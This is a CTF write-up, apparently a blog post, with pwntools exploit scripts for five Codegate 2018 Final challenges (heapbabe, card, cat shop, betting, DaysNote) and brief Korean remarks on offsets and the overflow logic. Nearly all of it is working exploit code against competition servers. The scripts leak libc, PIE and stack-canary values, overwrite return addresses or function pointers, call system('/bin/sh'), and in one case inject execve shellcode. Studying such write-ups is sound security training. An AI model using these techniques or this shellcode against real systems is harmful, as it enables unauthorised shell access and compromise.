Codegate 2018 Final

from pwn import *
 
#p=process('./heapbabe')
p=remote('110.10.147.41',8888)
 
def allocate(size,contents):
    p.sendlineafter('>> ','A')
    p.sendlineafter('size : ',str(size))
    p.sendafter('contents : ',contents)
 
def delete(idx):
    p.sendlineafter('>> ','F')
    p.sendlineafter('id : ',str(idx))
    p.sendlineafter('free : ','DELETE')
 
allocate(8,'\x00'*7) #0
allocate(8,'\x00'*7) #1
allocate(8,'\x00'*7) #2
allocate(8,'\x00'*7) #3
allocate(8,'\x00'*7) #4
delete(0) 
delete(1)
delete(2)
allocate(26,'%11$p'+'B'*19+'\xe0\x59') #ptr[0] = ptr ptr[1] address == data
delete(1)
stdout = int(p.recvuntil('B').split('B')[0],16) - 131
libc_base = stdout - 0x3c5620
system = libc_base + 0x45390
print hex(stdout)
print hex(libc_base)
print hex(system)
allocate(8,'\x00'*7) #ptr[2]
delete(2)
delete(3)
delete(4)
allocate(48,'/bin/sh;'+'B'*16+p64(system))
delete(3)
 
 
p.interactive()
 

card (BOF)

from pwn import *
 
p=process('./card')
#p=remote('110.10.147.17',8888)
canary = ''
 
def start(choice):
    p.sendlineafter('>>' ,'1')
    p.sendlineafter('>> ',str(choice))
 
def inpu(x,y,x2,y2):
    payload = '{0},{1}'.format(str(x),str(y))
    p.sendlineafter(': ',payload)
    p.recvuntil('= ')
    data = p.recvline().split('\n')[0]
    payload = '{0},{1}'.format(str(x2),str(y2))
    p.sendlineafter(': ',payload)
    return data
 
start(77777)
stack = ''
pie = ''
libc = ''
 
for x in range(0,4):
        temp = inpu(x,24,x,24)
        temp = int(temp,10)
        libc += hex(temp)[2:]
 
libc = p32(int(libc,16))[::-1]
libc = u32(libc) - 0x1b0d60
system = libc + 0x3a940
print hex(libc)
print hex(system)
for x in range(0,4): #stack
    temp = inpu(x,35,x,35) #24 stdout leak 35 stack leak
    temp = int(temp,10)
    stack += hex(temp)[2:]
stack = p32(int(stack,16))[::-1]
stack = u32(stack) - 0x390 #board pan
print hex(stack)
 
for x in range(0,4):
        temp = inpu(12+x,36,12+x,36) #24 stdout leak 35 stack leak (12,36) pieleak
        temp = int(temp,10)
        pie += hex(temp)[2:]
pie = p32(int(pie,16))[::-1]
pie = u32(pie) - 0x761
print hex(pie)
 
 
for x in range(653,656):
        temp = inpu(x,0,x,0)
        temp = int(temp,10)
        canary += hex(temp)[2:]
canary = '00' + canary
canary = p32(int(canary,16))[::-1]
canary = u32(canary)
print hex(canary)
 
target = ((0xffffffff+1)-stack)+pie+0x3024
 
if(((target/24) * 24) != target):
    tar = target - ((target/24) * 24)
    inpu(tar,(target/24),(tar+24),((target/24)-1))
else:
    inpu(0,(target/24),24((target/24)-1))
 
inpu(4,26,28,25)
inpu(0,27,24,26)
inpu(1,27,25,26)
inpu(0,26,24,25)
p.sendlineafter(': ','Clear')
payload = 'A'*500
payload += p32(canary)
payload += 'B'*4 + p32(stack-0xc) + 'D'*4
payload += p32(system) + 'A'*4 + p32(libc+0x15902b)
p.sendline(payload)
 
p.interactive()

서버에서 계속 쉘이 안 따져서 다시 확인을 해보니 오프셋을 잘못 구했었다 ㅠㅠ

게임을 이길때에는 내가 입력한 y값으로 비교를하게 만들어서 쉽게 이길 수 있다.

게임을 이기면 (pie+0x3024,buf,0x300) buf크기는 0x200 0x3024를 덮으라는 것 같다.

스택주소는 0xff ... 이니깐 0xffffffff을 넘어가면 0이되고 pie주소를 덮을 수 있다.

cat shop (UAF)

from pwn import *
 
#p=process('./catshop')
p=remote('211.117.60.76',8888)
 
print p.sendafter(':','\x01\x00\x00\x00')
print p.sendafter(':','\x05\x00\x00\x00')
print p.sendafter(':','\x02\x00\x00\x00')
print p.sendafter(':','\x04\x00\x00\x00')
print p.sendafter(':',p32(0x5))
print p.sendlineafter(':',p32(0x080488B6))
print p.sendafter(':','\x03\x00\x00\x00')
p.interactive()
 

betting (BOF)

from pwn import *
 
#p=process('betting')
p=remote('110.10.147.29',8282)
 
def bet(start,bet,lower):
    p.sendlineafter('? ',str(start))
    p.sendlineafter('? ',str(bet))
    p.sendlineafter(': ',lower)
 
p.sendlineafter('? ','A'*0x18)
p.sendlineafter('? ','2')
p.recvuntil('A\n')
canary = u64('\x00'+p.recv(7))
print hex(canary)
p.sendlineafter('? ','1')
p.sendlineafter('lower: ','A'*0x28+p64(canary)+'B'*8+p64(0x00000000004008F6))
 
p.interactive()
 

DaysNote (1byte brute force)

from pwn import *
import struct
#p=process('./DaysNote')
 
 
for i in range(0x4,0xff,+4):
    #p=remote('110.10.147.38',8888)
    p=remote('110.10.147.14',8888)
#   p=process('./DaysNote')
    context.arch='i386'
    context.os='linux'
    p.sendlineafter(': ','400')
    payload = "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\xB0\x23\x2C\x18\xCD\x80"
    payload += 'A'*(365-len(payload))
    payload += struct.pack('<B',i)
    print payload
    print i
    raw_input('$ ')
    p.sendlineafter(': ',payload)
    p.interactive()